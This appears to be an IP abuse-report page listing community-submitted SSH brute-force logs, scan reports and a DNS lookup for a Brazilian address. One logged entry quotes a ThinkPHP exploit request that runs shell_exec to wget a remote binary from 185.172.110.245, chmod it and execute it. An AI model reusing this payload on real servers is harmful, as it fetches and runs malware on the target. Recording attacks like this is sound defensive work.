City: unknown
Region: unknown
Country: Brazil
Internet Service Provider: Inforr-Solucoes em Tecnologia
Hostname: unknown
Organization: unknown
Usage Type: Fixed Line ISP
Type | Details | Datetime |
---|---|---|
attack | Invalid user 123 from 138.219.129.150 port 44772 |
2020-07-19 02:56:24 |
attackbots | 2020-07-08T11:07:16.072644ns386461 sshd\[21320\]: Invalid user junshang from 138.219.129.150 port 54760 2020-07-08T11:07:16.077336ns386461 sshd\[21320\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 2020-07-08T11:07:17.870573ns386461 sshd\[21320\]: Failed password for invalid user junshang from 138.219.129.150 port 54760 ssh2 2020-07-08T11:21:53.723095ns386461 sshd\[2675\]: Invalid user public from 138.219.129.150 port 34928 2020-07-08T11:21:53.727896ns386461 sshd\[2675\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 ... |
2020-07-08 17:55:24 |
attackbotsspam | $f2bV_matches |
2020-07-04 04:28:15 |
attack | Jun 24 12:06:01 game-panel sshd[15375]: Failed password for root from 138.219.129.150 port 37530 ssh2 Jun 24 12:08:49 game-panel sshd[15514]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 Jun 24 12:08:51 game-panel sshd[15514]: Failed password for invalid user nginxtcp from 138.219.129.150 port 44066 ssh2 |
2020-06-24 21:36:09 |
attackbots | Jun 24 07:50:59 jane sshd[18078]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 Jun 24 07:51:01 jane sshd[18078]: Failed password for invalid user polycom from 138.219.129.150 port 43914 ssh2 ... |
2020-06-24 17:00:45 |
attack | Jun 17 16:29:04 marvibiene sshd[9538]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 user=root Jun 17 16:29:06 marvibiene sshd[9538]: Failed password for root from 138.219.129.150 port 48120 ssh2 Jun 17 16:40:19 marvibiene sshd[9817]: Invalid user admin from 138.219.129.150 port 53624 ... |
2020-06-18 03:44:37 |
attackspambots | Jun 14 21:39:30 onepixel sshd[1039742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 Jun 14 21:39:30 onepixel sshd[1039742]: Invalid user teamspeak from 138.219.129.150 port 49520 Jun 14 21:39:32 onepixel sshd[1039742]: Failed password for invalid user teamspeak from 138.219.129.150 port 49520 ssh2 Jun 14 21:43:49 onepixel sshd[1040199]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.219.129.150 user=root Jun 14 21:43:51 onepixel sshd[1040199]: Failed password for root from 138.219.129.150 port 50560 ssh2 |
2020-06-15 10:06:04 |
attackspam | sshd jail - ssh hack attempt |
2020-06-12 19:39:15 |
attack | Invalid user ubnt from 138.219.129.150 port 50436 |
2020-06-11 06:40:02 |
attackspam | DATE:2020-06-09 08:00:47, IP:138.219.129.150, PORT:ssh SSH brute force auth (docker-dc) |
2020-06-09 14:28:43 |
IP | Type | Details | Datetime |
---|---|---|---|
138.219.129.169 | attackspam | 1581946484 - 02/17/2020 14:34:44 Host: 138.219.129.169/138.219.129.169 Port: 445 TCP Blocked |
2020-02-18 03:19:43 |
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 138.219.129.150
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13745
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;138.219.129.150. IN A
;; AUTHORITY SECTION:
. 515 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2020060900 1800 900 604800 86400
;; Query time: 113 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jun 09 14:28:38 CST 2020
;; MSG SIZE rcvd: 119
Host 150.129.219.138.in-addr.arpa. not found: 3(NXDOMAIN)
Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 150.129.219.138.in-addr.arpa: NXDOMAIN
IP | Type | Details | Datetime |
---|---|---|---|
177.155.207.82 | attack | SMTP-sasl brute force ... |
2019-06-22 11:36:48 |
107.170.172.23 | attack | SSH-Bruteforce |
2019-06-22 11:33:22 |
43.240.28.57 | attackspam | Request: "GET /xmlrpc.php HTTP/1.1" Request: "GET /xmlrpc.php HTTP/1.1" Request: "GET /xmlrpc.php HTTP/1.1" |
2019-06-22 11:16:13 |
143.255.2.68 | attack | Request: "GET / HTTP/1.1" |
2019-06-22 11:23:07 |
46.109.14.61 | attackbotsspam | Bad Request: "GET / HTTP/1.0" |
2019-06-22 11:21:37 |
80.245.115.153 | attack | Request: "GET / HTTP/1.1" |
2019-06-22 11:35:09 |
71.6.199.23 | attackbotsspam | 22.06.2019 02:04:28 Connection to port 8008 blocked by firewall |
2019-06-22 11:04:54 |
187.10.10.30 | attackspam | Request: "GET / HTTP/1.1" |
2019-06-22 11:24:09 |
58.244.89.146 | attackspam | 58.244.89.146 - - \[21/Jun/2019:21:36:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://185.172.110.245/x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0" ... |
2019-06-22 11:08:52 |
87.237.42.98 | attack | [portscan] Port scan |
2019-06-22 11:39:48 |
203.195.245.13 | attack | Jun 21 22:57:21 srv206 sshd[9545]: Invalid user ftpuser from 203.195.245.13 Jun 21 22:57:21 srv206 sshd[9545]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.195.245.13 Jun 21 22:57:21 srv206 sshd[9545]: Invalid user ftpuser from 203.195.245.13 Jun 21 22:57:23 srv206 sshd[9545]: Failed password for invalid user ftpuser from 203.195.245.13 port 55950 ssh2 ... |
2019-06-22 11:42:55 |
191.53.237.23 | attack | SMTP-sasl brute force ... |
2019-06-22 11:10:17 |
183.86.193.78 | attackbots | RDPBruteElK |
2019-06-22 11:43:29 |
167.250.8.115 | attackspambots | Request: "GET / HTTP/1.1" |
2019-06-22 11:22:35 |
45.67.14.180 | attack | Jun 22 04:38:17 bouncer sshd\[31188\]: Invalid user oracle from 45.67.14.180 port 48462 Jun 22 04:38:18 bouncer sshd\[31188\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=45.67.14.180 Jun 22 04:38:20 bouncer sshd\[31188\]: Failed password for invalid user oracle from 45.67.14.180 port 48462 ssh2 ... |
2019-06-22 11:24:42 |